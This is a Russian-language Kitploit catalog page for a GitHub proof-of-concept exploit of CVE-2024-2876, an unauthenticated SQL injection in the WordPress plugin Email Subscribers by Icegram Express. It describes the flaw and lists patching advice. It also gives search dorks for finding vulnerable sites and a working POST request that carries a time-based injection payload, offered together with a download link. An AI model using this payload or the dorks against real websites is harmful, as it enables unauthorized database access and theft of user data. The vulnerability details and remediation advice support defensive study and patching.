Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-2876 — Эксплойт proof-of-concept для критической уязвимости SQL-инъекции в плагине WordPress Email Subscribers. Включает детали эксплуатации, HTTP-запрос и поисковые дорки. | Kitploit
Инструменты/GitHubGitHub/kernel364/cve-2024-2876
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложений
GitHubkernel364/cve-2024-2876

CVE-2024-2876

Эксплойт proof-of-concept для критической уязвимости SQL-инъекции в плагине WordPress Email Subscribers. Включает детали эксплуатации, HTTP-запрос и поисковые дорки.

Репозиторий
221 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-2876 - Уязвимость SQL-инъекции в Email Subscribers от Icegram Express

Обзор

CVE-2024-2876 — это критическая уязвимость безопасности, обнаруженная в плагине «Email Subscribers by Icegram Express» для WordPress. Эта уязвимость затрагивает версии до 5.7.14 включительно и представляет значительный риск для более чем 90 000 веб-сайтов.

Детали уязвимости

  • CVE-ID: CVE-2024-2876
  • Оценка CVSS: 9.8 (Критическая)
  • Затронутые версии: до 5.7.14
  • Исправленная версия: 5.7.15 и выше

Описание

Уязвимость представляет собой дефект SQL-инъекции, который позволяет неаутентифицированным злоумышленникам выполнять вредоносные SQL-запросы к базам данных WordPress. Манипулируя пользовательскими вводами, которые не проходят должную санитарную обработку, злоумышленники могут извлекать конфиденциальную информацию, такую как имена пользователей, адреса электронной почты, хэши паролей и списки подписчиков.

Механизм эксплуатации

SQL-инъекция происходит внутри функции run класса IG_ES_Subscribers_Query плагина, где недостаточная проверка входных данных приводит к несанкционированному выполнению SQL-кода. Это нарушает целостность и конфиденциальность данных, хранящихся в базе данных WordPress.

Дорки CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

POC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

Рекомендации

  1. Немедленное обновление: Если вы используете плагин «Email Subscribers by Icegram Express», немедленно обновите его до версии 5.7.15 или новее, чтобы применить исправление безопасности.

  2. Регулярные аудиты: Регулярно проверяйте и обновляйте все плагины и темы WordPress до последних версий для обеспечения безопасности.

  3. Плагины безопасности: Используйте надежные плагины безопасности WordPress для усиления защиты от SQL-инъекций и других киберугроз.

  4. Надежные парольные политики: Используйте надежные и уникальные пароли для всех учетных записей, связанных с вашим сайтом WordPress, чтобы снизить риски несанкционированного доступа.

Последствия невыполнения требований

Необновление затронутого плагина может оставить веб-сайты уязвимыми для утечек данных и несанкционированного доступа. Учитывая широкое распространение этого плагина, немедленные действия имеют решающее значение для защиты установок.

Скачать инструмент